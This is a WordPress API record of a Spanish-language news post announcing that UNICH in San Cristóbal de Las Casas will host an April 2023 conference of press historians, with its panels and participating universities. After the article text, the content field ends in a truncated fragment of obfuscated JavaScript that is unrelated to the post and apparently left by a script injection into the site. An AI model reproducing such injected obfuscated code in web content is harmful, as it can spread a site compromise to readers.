{"id":9718,"date":"2023-04-25T04:55:35","date_gmt":"2023-04-25T04:55:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9718"},"modified":"2023-04-25T04:55:36","modified_gmt":"2023-04-25T04:55:36","slug":"unich-sera-sede-del-xiii-encuentro-de-la-red-de-historiadores-de-la-prensa-y-el-periodismo-en-iberoamerica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9718","title":{"rendered":"UNICH ser\u00e1 sede del XIII Encuentro de la Red de Historiadores de la Prensa y el Periodismo en Iberoam\u00e9rica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"627\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-24-at-4.17.26-PM-627x1024.jpeg\" alt=\"\" class=\"wp-image-9719\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-24-at-4.17.26-PM-627x1024.jpeg 627w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-24-at-4.17.26-PM-184x300.jpeg 184w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-24-at-4.17.26-PM-768x1255.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-24-at-4.17.26-PM-940x1536.jpeg 940w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-24-at-4.17.26-PM.jpeg 979w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>24 de Abril del 2023. San Crist\u00f3bal de Las Casas.- La Universidad Intercultural de Chiapas (UNICH), dio a conocer que ser\u00e1 sede del XIII Encuentro de la Red de Historiadores de la Prensa y el Periodismo en Iberoam\u00e9rica, a realizarse los d\u00edas 27 y 28 de abril, donde se tiene programado la participaci\u00f3n de m\u00e1s de 100 investigadores de 32 instituciones de educaci\u00f3n superior.<\/p>\n\n\n\n<p>De acuerdo con los antecedentes, esta red se remonta a 1999, cuando Celia del Palacio Montiel convoc\u00f3 a los interesados en el estudio de la historia del periodismo a compartir y difundir sus resultados de investigaci\u00f3n, en aquella mesa de trabajo, celebrada en la Universidad de Guadalajara, los participantes acordaron crear la Red de Historiadores de la Prensa y reunirse peri\u00f3dicamente para compartir sus hallazgos en este campo, entonces novedoso.<\/p>\n\n\n\n<p>Las mesas a realizarse el d\u00eda 27 de abril son: La prensa electoral en el siglo XIX, El deber ser femenino en la prensa, Nota roja y violencias, Im\u00e1genes en la prensa, Entre el sensacionalismo y la denuncia, Prensa y pol\u00edtica, La prensa como espacio de acci\u00f3n, Prensa y Estado, Violencias contra periodistas, La prensa como fuente, Violencias y delitos en la prensa, Disputas por el poder pol\u00edtico.<\/p>\n\n\n\n<p>Para el d\u00eda 28 se tienen programadas: Las impresiones del siglo XX, Prensa, literatura e imaginarios, Periodistas en apuros. Las desgracias del oficio period\u00edstico, Desgracias sin fronteras, guerra, muerte y opresi\u00f3n cubiertas en los peri\u00f3dicos, Representaciones de las violencias en las mujeres en la prensa, La religi\u00f3n se expresa en la prensa, Las emociones infantiles y femeninas en los peri\u00f3dicos decimon\u00f3nicos, entre otros.<\/p>\n\n\n\n<p>En este 2023 participan de las instituciones Benem\u00e9rita Universidad Aut\u00f3noma de Puebla, Centro de investigaci\u00f3n y Docencia Econ\u00f3micas, El Colegio de Jalisco, El Colegio de M\u00e9xico, El Colegio de San Luis Potos\u00ed, la Escuela de Periodismo Carlos Septi\u00e9n Garc\u00eda INAH, el Instituci\u00f3n Educativa T\u00e9cnica Pedro Pab\u00f3n Parga del municipio de Carmen de Apical\u00e1-Tolima, Instituto de Investigaciones Dr. Jos\u00e9 Mar\u00eda Luis Mora, Instituto Federal de Goi\u00e1s, Instituto Tecnol\u00f3gico y de Estudios Superiores de Occidente y la Universidad Aut\u00f3noma Metropolitana.<\/p>\n\n\n\n<p>As\u00ed tambi\u00e9n la Universidad Nacional Aut\u00f3noma de M\u00e9xico, Universidad Aut\u00f3noma Benito Ju\u00e1rez de Oaxaca, Universidad Aut\u00f3noma de Baja California, Universidad Aut\u00f3noma de Chiapas, Aut\u00f3noma de la Ciudad de M\u00e9xico, Aut\u00f3noma de Sinaloa, Aut\u00f3noma de Zacatecas, de Buenos Aires, de Ciencias y Artes de Chiapas, de Colima, de Guadalajara, de Guanajuato Universidad de Sonora, Universidad Iberoamericana, Universidad Intercultural de Chiapas, Ju\u00e1rez del Estado de Durango, Universidad Michoacana de San Nicol\u00e1s de Hidalgo, Universidad Nacional de Tucum\u00e1n, Universidad Panamericana y la University of Warwick.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 24 de Abril del 2023. San Crist\u00f3bal de Las Casas.- La Universidad Intercultural de Chiapas (UNICH), dio a conocer que ser\u00e1 sede del XIII Encuentro de la Red de Historiadores de la Prensa y el Periodismo en Iberoam\u00e9rica, a realizarse los d\u00edas 27 y 28 de abril, donde se tiene programado la participaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9719,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9718","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9718","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9718"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9718\/revisions"}],"predecessor-version":[{"id":9720,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9718\/revisions\/9720"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9719"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9718"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9718"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9718"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}